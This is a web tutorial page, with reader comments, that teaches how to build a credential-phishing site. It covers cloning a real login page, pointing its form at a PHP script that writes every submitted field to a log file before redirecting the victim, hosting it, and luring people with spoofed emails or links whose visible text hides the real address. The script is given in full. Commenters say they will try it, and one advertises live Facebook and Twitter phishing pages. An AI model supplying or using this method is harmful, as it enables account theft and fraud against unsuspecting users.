ThisisLegal.com
 

Phishing Pages

So what exactly is phishing? Well, phishing is getting someone to click on a link to a fake login page that you have made and fooling them into entering their login details. The steps below are a basic overview on how to do this.

1. Decide who / where you would like to get into

Pick a target and get to know the process of the login or form. Where are users taken if incorrect details are entered and can the error page be linked to directly (permalink)? Next it is time to make a copy of the page.

2. Save the source locally as a HTML file (e.g. login.html)

You will need most if not all of the files loaded into the page, including images and stylesheets (CSS files.) Normally using the Save shortcut (Ctrl + S) will bring up a popup allowing you to save the content locally. Make sure "Webpage, Complete" is selected and select a folder to save to.

If this option is not available then right click and select "View Source" and copy the contents into a text editor and save any images or stylsheets manually to the correct relative paths, or look for web scraper software. If done correctly the page should look exacly the same as the live version with no broken images.

Next you will need to change the form action. This will normally look similar to the following:

<form action="/login" method="post">

Change "/login" to be the name of the file used to save data as mentioned in the next section (e.g. "save.php").

3. Make a server side script to save data entered into the form

In the example below PHP is used. Copy the following code into a text editor and save the file as "save.php".

<?php 
$logFile "data.txt"

$handle fopen($logFile"a"); 
foreach ($_POST as $name => $value) { 
  fwrite($handle$name ."="$value ."\n"); 
}
fwrite($handle"\n-----\n"); 
fclose($handle);

header("Location: http://innocentlink.com/"); 
exit; 
?>

If the form error page can be linked to directly change the "innocentlink" to go to this page, otherwise change the log to be the external location of the form. The code above simply saves all POST data to a log file but a database could be used instead.

4. Find a webhost that supports PHP

There are many free PHP web hosts available but you will of course need to find one that doesn't display on page ads. Finally upload all of the files to the host and visit the page in a browser. If done correctly the page should look identical to the real thing. Next enter any data into the form and view the contents of the log file. If done correctly this data should now be saved.

Now all you need to do is convice users to visit your link and enter their data. You can achieve this by spoofing an e-mail from a company or sending the link disguised under anchor text (<a href="http://maliciouslink.com">http://innocentlink.com</a>) for example. How you do this is up to you.

Previous Tutorial  |  Next Tutorial


Comments

Gringo Master
Reply

Thanks, I\'m gonna try this.

Guest
Reply

thanks it works to

t3chno
Reply

I need help (reply to yh123@live.co.uk)



I downloaded the rapidshare phish in the phishing section of this site and uploaded it on my subdomain on at 100webspace but every time i go to the subdomain, it says 900 and thats is it i.e it does not display the phish. support on this matter will be highly appreciated. thankyou

t0mmy9
Reply

Did you ever get this working?

Supersherif
Reply

Pls how many of the files are we uploading..i understand it stage 5

TheN00B
Reply

You can make phishing page with BackTrack

1smartlord
Reply

wow check out my fb phishing page www.lilfb.nazuka.net n my twitter phishing page www.lilfb.nazuka.net/twitter # thank you Sir. This tutorial help me alot | I luv this forum